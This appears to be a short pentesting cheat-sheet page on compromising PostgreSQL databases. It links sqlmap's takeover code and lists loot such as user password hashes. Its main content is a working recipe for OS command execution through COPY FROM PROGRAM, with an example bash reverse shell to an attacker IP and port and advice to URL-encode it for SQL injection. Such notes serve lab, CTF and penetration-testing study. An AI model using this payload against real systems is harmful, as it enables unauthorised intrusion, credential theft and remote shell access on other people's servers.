PostgreSQL

Compromising DB - [sqlmap code]:

https://github.com/sqlmapproject/sqlmap/blob/582bb2fec960db825478a54c0aabbd7ba551f1b8/plugins/dbms/postgresql/takeover.py

Properties:

Nested Queries= query1;query2;...
Interact with DB via cmd line: psql quit: \q
Loot: 1. DBMS Version 2. Database Content 3. DBMS Users Password Hashes 4. OS Shell

OS Shell [ v9.3–v14 ]:

1. DROP TABLE IF EXISTS cmd_exec; 2. CREATE TABLE cmd_exec(cmd_output text); 3. COPY cmd_exec FROM PROGRAM '<cmd>' For eg. COPY cmd_exec FROM PROGRAM 'bash -c "/bin/bash -l > /dev/tcp/10.10.14.12/7909 0<&1 2>&1"' Note: single quotes needed for command. URL encode the whole POST/GET data.

PreviousDatabase Exploitation NextBlind SQLi script

Last updated 3 years ago

hashtagCompromising DB - [sqlmap code]:

hashtagProperties:

hashtagOS Shell [ v9.3–v14 ]:

Compromising DB - [sqlmap code]:

Properties:

OS Shell [ v9.3–v14 ]: